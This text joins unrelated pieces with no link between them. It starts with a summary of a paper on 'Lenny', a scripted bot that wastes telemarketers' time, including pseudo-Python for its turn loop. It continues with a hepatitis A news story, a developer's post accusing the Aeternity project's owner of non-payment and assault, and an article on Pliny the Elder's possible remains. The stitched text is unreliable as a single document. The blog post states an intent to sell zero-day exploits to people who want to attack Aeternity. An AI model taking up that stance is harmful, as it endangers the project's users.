In the US alone there were over 5 million complaints about unwanted or fraudulent calls in 2016. About 75% of generic fraud-related complaints cite the telephone as the initial method of contact. The people behind unwanted calls may, for example, be fundraising, telemarketing, or simply scamming. The callers may use robocalls playing pre-recorded messages, or real people in call centres. Having real people do the calling makes campaigns more effective. Among the 5 million 2016 complaints, 64% were robocalls, and hence 36% involved human agents. The cost of employing people becomes the limiting factor for fraudsters.

Callers have a script that they follow. For example, many spam calls begin with the following components:

  • greeting (e.g. ‘Hello’)
  • self-identification (name of the call agent)
  • company identification (name of the business)
  • warm up talk (‘how are you today?’)
  • statement of the reason for the call
  • callee identity check (callee’s name and attribute)

Through a call, spammers may ask a number of questions. Even if the target does not in the end follow through on the offer, this information can be used to enrich datasets for future campaigns. Here’s a quick summary of popular spam call types and the sorts of information they may request:


How Lenny works

Although there is no indisputable evidence of this chatbot’s origins, some information can be found online. Lenny has been reported to be a recording performed for a specific company who wanted to answer telemarketing calls politely. Later, the recordings were modified to suit residential calls.

Even without any AI or speech recognition mechanism Lenny is able to trick many people and keep conversations going for many minutes, and in one case up to an hour!

Conversations with a hosted version of Lenny are available on a public YouTube channel (conducted in a country and under conditions which make the recordings legal), and it is a selection of 200 calls from this archive which are analysed for this paper. When a phone user identifies a spam call they can transfer the call to the PBX server hosting Lenny, or alternatively have blacklisted spam numbers sent straight to Lenny without even answering.

Lenny simply plays a set of audio recordings one after another to interact with the caller. The same set of prompts is always used in the same order. Lenny is controlled by an IVR script which allows simple scripting and detection of silences.

The script starts with a simple “Hello, this is Lenny.” and will wait for the caller to take his turn. If he does not respond within 7 seconds, the server switches to a set of “Hello?” playbacks until the caller takes his turn. However, if the caller speaks, the IVR script waits until he finishes his turn. The script detects the end of the caller’s turn by detecting a 1.55 second long silence period, at which point it plays the next recording. When the 16 distinct turns that are available have been played, it returns to the 5th turn (the first 4 prompts are supposed to be introductory adjacency pairs) and continues playing those 12 turns sequentially, forever.
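
The control flow above is simple enough to sketch in a few lines of pseudo-Python. The function names (play, wait_for_speech, wait_for_silence) are hypothetical stand-ins for the IVR primitives; only the timings and the turn ordering come from the description of Lenny’s script.

HELLO_TIMEOUT = 7.0         # seconds of caller silence before switching to "Hello?" playbacks
END_OF_TURN_SILENCE = 1.55  # seconds of silence that mark the end of the caller's turn
INTRO_TURNS = 4             # the first four prompts are introductory and are never repeated

def run_lenny(turns, hello_prompt, play, wait_for_speech, wait_for_silence):
    """Cycle through Lenny's 16 recorded turns, replaying turns 5-16 forever."""
    index = 0
    while True:
        play(turns[index])
        # Nudge a silent caller with "Hello?" until they start talking.
        while not wait_for_speech(timeout=HELLO_TIMEOUT):
            play(hello_prompt)
        # The caller's turn ends after 1.55 s of continuous silence.
        wait_for_silence(END_OF_TURN_SILENCE)
        index += 1
        if index >= len(turns):
            index = INTRO_TURNS  # loop back to the 5th turn (index 4)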

The secret behind Lenny: conversation analysis

Why does a fixed set of 16 pre-recorded responses work so well? Lenny’s secret is that it’s based upon findings from Conversation Analysis – something that might be of use to anyone designing bots in other contexts too!

Conversation Analysis (CA) is a sociological perspective which aims at studying the organization of natural talk in interactional order to uncover the seen but unnoticed methodical apparatus which speakers and recipients use in order to solve the basic organizational issues they deal with while talking. Trying to show how the participants to a conversational exchange orient themselves on those methods, CA adopts a descriptive stance, deeply rooted into the detailed analysis of recorded conversational exchanges.

Key results from CA date back to the 1970’s. There are four main mechanisms in conversations which have been isolated and explained:

  • The turn-taking apparatus: methods used to minimise gaps and overlaps while taking turns in a conversation
  • Trouble management: how speakers repair any trouble in hearing, understanding, or speaking
  • The ‘sequential organisations of actions in talk exchanges’ which describes how conversationalists assemble their turns in sequences of actions that go together. One common type of sequence is the adjacency pair: for example question -> answer, greeting exchanges, offers -> accept/reject and so on.

… adjacency pairs point to the normative expectations that are embedded into the ways we order turns at talk as pairs.

  • The last mechanism clarifies how speakers use membership categories during talk exchanges (for example, being elderly).

Calls with Lenny

The 200 randomly selected calls from the 487 publicly available at the time of the study were sent to a commercial transcription service, and selected fragments were further converted to the ‘Jeffersonian transcription notation‘ required for very fine-grained analysis. Call logs from 19,402 calls to the PBX were also analysed.

Best not to answer your phone if someone calls around 1pm on a Wednesday it seems!

Here’s the breakdown of how long Lenny managed to keep spammers talking for conversations on the YouTube channel. Spammers on average spend 10:13 minutes talking to Lenny, and these conversations have an average of 58 turns!

…72% of calls contain Lenny’s set of scripts repeated more than once. On average, a caller hears 27 turns of Lenny, which corresponds to 1.7x repetition of the whole script… Surprisingly, in only 11 calls (5%), the caller realizes and states that he is talking to a recording or an automated system.

Spammers get frustrated talking to Lenny, but only scammers tend to start cursing!

Here’s a reminder of Lenny’s first five steps (T1 to T5):

From a CA perspective there are both sequential and turn-constructional features here which help to keep the call going. T1 and T2 are first pair parts of adjacency pairs, which project second pair parts. T3 and T4 are designed as second pair parts of an adjacency pair (i.e., they are designed to follow a question, proposal, request etc.). T4 adds the ‘oh’ turn-initial particle, “which has been demonstrably analyzed as a change-of-state token”, and works well when followed by an assessment token (‘good’) and the affirmations (yes, yes, yes). T5 pre-supposes that the reason for the call has been previously introduced by the caller. Almost all turns display self-initiated self-repairs.

Inspecting Lenny’s turns in isolation is not sufficient to understand how Lenny can be so efficient in so many different calls. This efficiency is locally built in each call’s development. Once embedded into a real call, each of Lenny’s turns displays an understanding of the prior turn and brings new material to be understood by his co-participant. This in situ inspection of Lenny’s turns is inevitably made, with more or less care, by the participants, in order to build their own contribution and to fit each new turn into the ongoing conversation. This is what CA calls the “next-turn proof procedure” and what explains the various, flexible ways in which Lenny’s turns can play their part in some calls.

Sadly, we have to wait for another paper for analysis of Lenny’s conversation beyond the introduction. (But remember you can check out some of the recorded conversation to hear it for yourself).

How to design a Lenny-like bot

At the end of the paper, you’ll find a set of eight guidelines for developing Lenny-like bots, some of which may also be useful in other contexts!

  1. Maximise coherence between all the features of the chatbot available at first hearing (e.g., voice, accent, gender, class of age membership etc., must all be congruent).
  2. The first available recognised identity of the bot should be tied to repeat queries – develop a set of repeat queries e.g., based on hearing issues, connection problems, incidents during the call and so on.
  3. Design a list of queries checking the identity of the caller, organisation etc.
  4. Design 3 or 4 multi-turn units. The first unit that begins the turn should signal that it will not be connected to the previous ones with a ‘misplacement marker’ (e.g. ‘By the way…’).
  5. Design an attention checking turn (‘hello? Are you still there?’) to be activated after a few seconds of silence
  6. Carefully design the sequential order of the first turns, to get you through the introductory period
  7. Preserve an equilibrium between initiating and responding turns.
  8. Have at least 20 turns, to prevent the risk of looping too early.

Machine Learning: An Applied Econometric Approach [pdf]


The Economics of Garbage Collection (2011) [pdf]

San Diego Declares Health Emergency Amid Hepatitis A Outbreak


A nurse loads a syringe with a vaccine against hepatitis at a free immunization clinic for students before the start of the school year, in Lynwood, California in 2013. Robyn Beck/AFP/Getty Images


San Diego's homeless population has been hit hardest by the highly contagious hepatitis A virus.

The outbreak, which began in November, has spread after vaccination and educational programs in the city failed to reduce the infection rate. The virus attacks the liver.

The public health declaration bolsters the county Health and Human Services Agency's ability to request state assistance to fund new sanitation measures. Areas with high concentrations of homeless people will receive dozens of portable hand-washing stations. Health workers will also use bleached-spiked water for power-washing contaminated surfaces.

Dr. Wilma Wooten, the San Diego Public Health Officer who signed the declaration into law on Friday, says the sanitation precautions are modeled after similar programs in other Southern California cities - including Los Angeles.

"We know that L.A. has had no local cases of hepatitis A related to the strain that we're seeing here in San Diego," she said. "It makes sense that, if they're doing it there and they haven't had any cases, it could be beneficial here as well."

The first cases linked to the outbreak were reported in November. As of Friday, more than 15 people in the area have died from hepatitis infections and more than 350 others have been sickened.

According to the World Health Organization most hepatitis A outbreaks are primarily spread when an uninfected person ingests food or water that is contaminated with the feces of an infected person. The disease is closely associated with unsafe water or food, inadequate sanitation and poor personal hygiene.

Hepatitis A infections are common among the homeless population due to the lack of access to sanitary facilities. San Diego's efforts to combat the illness began earlier this summer. Health workers promoted hand washing practices and stepped-up street cleanings - but an article published by Voice of San Diego highlighted bureaucratic obstacles that have delayed sanitation improvements in the city.

Concerns have also been raised over the city's ability to handle the outbreak. Employees of the Service Employees International Union say the county doesn't employ enough public health professionals to meet the demands of the growing epidemic.

The California State Legislature is reviewing whether the county's health resources are adequate. Its findings are expected within the next several months.

Why I left


1 August 2017

discuss this on reddit

  • What is going on? I left Aeternity. Many of you have been wondering why I have been so quiet lately. Usually Zack loves talking about himself. For my own safety I waited until I was far away from the rest of the Aeternity team.

  • How did this happen? I am young. I didn't think it mattered who owned the company "Aeternity". I didn't find out who owns Aeternity until the token sale was over, and all the $77 million were controlled by the owner of Aeternity.

Things I have done for Aeternity:

  • I invented and implemented Turing complete state channels.
  • I invented and implemented off-chain markets, which is Aeternity's killer app.
  • I invented and implemented an oracle mechanism which is orders of magnitude more efficient than the competition.
  • I invented and implemented the Aeternity governance mechanism, for updating variables like block-size and block-reward.
  • I answered technical questions.
  • I came up with the ideas in the Aeternity white paper.
  • I gave training in Aeternity technology.
  • I implemented a Merkle trie database for Aeternity.
  • I implemented a virtual machine with compilers for Aeternity.
  • I wrote the Aeternity testnet.
  • I wrote the lightning network on top of the testnet.
  • I wrote an off-chain marketplace in the lightning network.
  • I helped Aeternity to raise over $77 million from an ICO.
  • I gave talks, I flew places to interview people.
  • I memorized lines and was an actor in the Aeternity movie.
  • I did livestreams of software development.
  • I maintained the testnet and github for over 9 months.
  • I let Aeternity use my name.

  • What I should reasonably get:

The team that raised the money had about 6 members. Out of these 6 people, I was the only one working on the technology. Since this is a technology startup, I should be controlling at least half of this money. I should be deciding how Aeternity uses its money in regard to developing the technology. I should be deciding which programmers to hire, and which tasks should be worked on. Instead the anonymous owner of Aeternity is deciding how the money is spent.

  • How much I was willing to work for:

For about $3.5 million I was willing to work exclusively on Aeternity.

For about $1.7 million I was willing to make Aeternity secure and work on Aeternity non-exclusively.

For about $300 000 I was willing to leave Aeternity, as long as Aeternity didn't use the technology I invented.

  • To the Aeternity investors:

I am very sorry that this has happened to you. Many of you were tricked because I was tricked first. I shouldn't have let myself fall for this. I apologize.

January 2015- I began programming the blockchain that would eventually be called Aeternity. At the time it was called "Flying Fox". I invented turing-complete state channels for this blockchain, and I did the research necessary to be able to build the Aeternity oracle and governance.

March 2017- Aeternity tells me I am the founder and will be highest paid out of Aeternity, and that I will control at least 10% of the budget.

May- I keep bringing up how much I want to get paid, and asking to see how the budget is planned to make sure I can get paid. The owner of Aeternity says that we will discuss it more "tomorrow", or "after my trip", or "after I sleep", or "later". The owner of Aeternity says that if I mention anything to the community about how unstable my relationship is with Aeternity, that Aeternity will not pay me anything, and Aeternity will sue me for damages.

June- Money was collected from the contribution campaign. Other programmers were getting paid regularly, but I have still not been paid. So I went on strike. I stopped answering technical questions, and I stopped helping with Aeternity software. I demanded that Aeternity and I come to agreement about how I will get paid.

August- The owner of Aeternity tells me that I am not a founder. The owner tells me that I am a junior erlang programmer, and that he already has other more experienced erlang programmers who want to work for him. The owner tells me that Aeternity is not interested in using any of the technology I invented, or any of the software I have written. So, he asks me how much I think would be a fair payment under these circumstances. I am comfortable being paid $300 000. If Aeternity doesn't want to use my technology, then this means I have failed, so I am willing to be paid a small amount.

Aeternity developers are still working on the technology that I invented. Aeternity is still describing itself to the public as using the technology that I invented. I think that the owner of Aeternity is lying to me. Aeternity wants to use the technology I invented without paying me.

August 17- Aeternity finally makes an offer to hire me that I am comfortable with. In the process of negotiating my employment, the owner of Aeternity was asking me technical questions, and the honest answers I gave made him angry. He wished that the universe worked differently, and he blamed me, the messenger of bad news. The owner of Aeternity was so upset by the technical limitation that he did something to me that both scared and injured me. I no longer feel safe working with this person. I am walking with a limp a week later.

The owner of Aeternity is someone who punishes people that tell him uncomfortable truths. So, it is impossible for the owner to understand the technology, or to hire people who understand it.

Immediately after the awful experience, Aeternity's owner and three other employees get together to pressure me into signing a contract where I would agree to not talk about what happened to me. They tell me I wont get paid unless I sign. The contract says "Zack agrees that all of his work is worth $300 000, and that Aeternity owes him nothing more". and "Zack agrees to never say anything about Aeternity, or else Aeternity can sue him for damages." I have not signed.

It is very hard for me to program while in a state of fear. I cannot work with people who make me feel this way. I stopped communicating with the community because I was afraid for my physical security.

August-

The Aeternity lawyer spent 5 days with me, begging me to sign the contract. I wonder how much lawyers get paid per hour. He kept saying stuff like "This contract is only for you Zack, it doesn't benefit us at all."

Aeternity hires a "new CTO", as if I was stepping down from some kind of power. In private I was an unpaid "junior erlang dev" with no control over how funds are used, essentially an intern, but in public I was the "technical lead". It is not fair that Aeternity uses my name this way when they don't give me any power. This is a trick so that they can blame me for their mistakes.

September-

I have left Europe. I am in a safe place. I finally feel safe enough to communicate with the community again.

If Aeternity is going to use the technology I invented, and they won't pay me to make their software secure, then my only way to get paid is by selling zero-day exploits to people who want to attack Aeternity.

As far as I know, Marion also has not been paid. Aeternity might steal from her too, which could be a disaster.

The Aeternity leadership doesn't understand the technology. So it is impossible for them to hire programmers who do understand. They will be able to sell most of their AE tokens before the blockchain gets launched. So they have little incentive to deliver a working product.

I want to work on blockchains for at least the next decade. Keep an eye on my github: https://github.com/zack-bitcoin

Lessons I Wish I Had Learned Before Teaching Differential Equations (1997) [pdf]

Pompeii Hero Pliny the Elder May Have Been Found 2,000 Years Later


Italian scientists are a few thousand euros and a test tube away from conclusively identifying the body of Pliny the Elder, the Roman polymath, writer and military leader who launched a naval rescue operation to save the people of Pompeii from the deadly eruption of Mt. Vesuvius 2,000 years ago.

If successful, the effort would mark the first positive identification of the remains of a high-ranking figure from ancient Rome, highlighting the work of a man who lost his life while leading history's first large-scale rescue operation, and who also wrote one of the world's earliest encyclopedias.

Given that Italian cultural and scientific institutions are mired in budget troubles, the Pliny project is seeking crowdfunding for the scientists, who also studied Oetzi the Iceman – the 5,300-year-old mummy found perfectly preserved in an alpine glacier.


Sailing into the dark

The remains now believed to be Pliny's were found more than a century ago. But identifying the body has only recently become feasible, says Andrea Cionci, an art historian and journalist who last week reported the findings in the Italian daily La Stampa.

Gaius Plinius Secundus, better known as Pliny the Elder, was the admiral of the Roman imperial fleet moored at Misenum, north of Naples, on the day in 79 C.E. when Vesuvius erupted.

According to his nephew, Pliny the Younger, an author and lawyer in his own right who was also at Misenum and witnessed the eruption, Pliny the Elder's scientific curiosity was piqued by the dark, menacing clouds billowing from the volcano. Initially he intended to take a small, fast ship to observe the phenomenon. But when he received a desperate message (possibly by signal or pigeon) from a family he knew in Stabiae, a town near Pompeii, he set out with his best ships to bring aid not only to his friends "but to the many people who lived on that beautiful coast."


A deadly cloud

He would have had about a dozen quadriremes, warships with four banks of rowers, at his disposal, says Flavio Russo, who in 2014 wrote a book for the Italian Defense Ministry about Pliny's rescue mission and the tentative identification of his remains.

These ships were some of the most powerful units in the Roman naval arsenal, capable of carrying some 200 soldiers (or survivors) on deck while braving the stormy seas and strong winds stirred up by the eruption, Russo told Haaretz in an interview. "Before him, no one had imagined that machines built for war could be used to save people," he said.

The Roman fleet made the 30-kilometer journey across the Gulf of Naples at full speed, launching lifeboats to collect the hundreds of refugees who had made their way to the beaches.

According to Pliny the Younger, his uncle also disembarked and went looking for his friends in Stabiae. But as he was leading a group of survivors to safety, he was overtaken by a cloud of poisonous gas, and died on the beach.

We do not know how many people reached the safety of the ships before the cloud moved in. Russo estimates the fleet may have saved up to 2,000 people – a number roughly equal to the estimated number of those killed in the eruption, as the volcanic spew wiped out the towns of Pompeii, Herculaneum and Stabiae.

Pliny the Younger's description of the eruption is considered so accurate that experts today refer to similarly explosive volcanic events as "Plinian eruptions."

Indirect evidence confirming his story was found in the 1980s, when archaeologists digging at the ancient port of Herculaneum uncovered the remains of a legionnaire and a burnt boat, possibly one of the lifeboats and a crew member dispatched by Pliny's fleet. They also found the skeletons of some 300 people who had sought refuge in the covered boat sheds of the port, only to die instantly when the so-called pyroclastic surge, a superheated cloud of volcanic gas and rock typical of these kinds of eruptions, rolled down Vesuvius, killing everyone in its path.


Wouldn't prance like a ballerina

In the first years of the 20th century, amid a flurry of digs to uncover Pompeii and other sites preserved by the layers of volcanic ash that covered them, an engineer called Gennaro Matrone uncovered some 70 skeletons near the coast at Stabiae. One of the bodies carried a golden triple necklace chain, golden bracelets and a short sword decorated with ivory and seashells.

Matrone was quick to theorize that he had found Pliny's remains. Indeed, the place and the circumstances were right, but archaeologists at the time laughed off the theory, believing that a Roman commander would not run around "covered in jewelry like a cabaret ballerina," Russo said.

Humiliated, Matrone sold off the jewels to unknown buyers (laws on conservation of archaeological treasures were more lax then) and reburied most of the bones, keeping only the supposed skull of Pliny and his sword, Russo said.

These artifacts were later donated to a small museum in Rome – the Museo di Storia dell'Arte Sanitaria (the Museum of the History of the Art of Medicine) – where they have been kept, mostly forgotten, until today.

Russo, who has been the main driving force behind efforts to confirm the identification, says that judging by Matrone's drawings, the jewelry found on the mysterious skeleton as well as the ornate sword are compatible with decorations common among high-ranking Roman navy officers and members of the equestrian class, the second-tier nobility to which Pliny belonged.

Furthermore, an anthropologist has concluded that the skull held in the museum belonged to a male in his fifties, Russo said. We know from Pliny the Younger that his uncle was 56 when he died.

With evidence mounting, Russo and Cionci turned to the Oetzi the Iceman team to have them perform more tests on the skeleton from Stabiae.

"We are not saying that this is Pliny, merely that there are many clues that suggest it, and we should test this theory scientifically," Cionci said. "This is something unique: it's not like we have the bones of Julius Caesar or Nero."

Tell-tale teeth

Researchers plan to carry out two tests: a comparison between the skull's morphology with known busts and images of Pliny, and, more importantly, an examination of the isotope signatures in his teeth.

"When we drink water or eat something, whether it's plants or animals, the minerals from the soil enter our body, and the soil has a different composition in every place," explains Isolina Marota, a molecular anthropologist from the University of Camerino, in central Italy.

By matching the isotopes in the tooth enamel, which is formed in childhood, with those in soil samples, scientists can determine where a person grew up. In the case of the Iceman, they managed to pinpoint the Alpine valley where he had spent his childhood. For Pliny, they would look for signatures from the northern Italian town of Como, where he was born and bred, Marota told Haaretz.

She estimated the tests would cost around 10,000 euros. Once the money is found, obtaining the necessary permits and performing the research will take some months, she said.

For its part, the museum hosting the skull would be happy to sacrifice a bit of a tooth to highlight the importance of their exhibit, said Pier Paolo Visentin, secretary general of the Accademia di Storia dell'Arte Sanitaria, which runs the museum.

Visentin noted that while we have names on Roman sarcophagi and burials in catacombs, there are no cases of major figures from ancient Rome whose remains have been positively identified – leaving aside traditions and legends linked to the relics of Christian saints and martyrs.

For one thing, Romans favored cremation throughout much of their history. And when they did bury their dead, they did not embalm them like the Egyptians, who have left us a multitude of neatly labeled mummies of pharaohs and officials.

Finally, the Italian climate isn't dry like the Egyptian desert and the looting of ancient monuments that was common during the Middle Ages would have done the rest, he says.

"This is quite a unique case, since these remains were preserved in the time capsule that is Pompeii," Visentin said.

You quote Pliny all the time

Besides his last, humanitarian gesture, Pliny is known for the books he wrote, ranging from military tactics, to history and rhetoric. His greatest and only surviving work was his Naturalis Historia (Of Natural History): 37 books filled with a summation of ancient knowledge on astronomy, mathematics, medicine, painting, sculpture and many other fields of the sciences and arts.

Pliny's work inspired later encyclopedias: most of us at some point have unknowingly cited him. Perhaps, looking at these experiments on his possible remains, he would be skeptical of any conclusions, telling us to take them "with a grain of salt" and reminding us that "the only certainty is that nothing is certain."

Or perhaps he would encourage scientists to forge on, repeating what, according to his nephew, he said when his helmsman suggested they return to port as scalding ash and fiery stones began raining on the fleet headed for Vesuvius. His response was: "Fortune favors the bold."
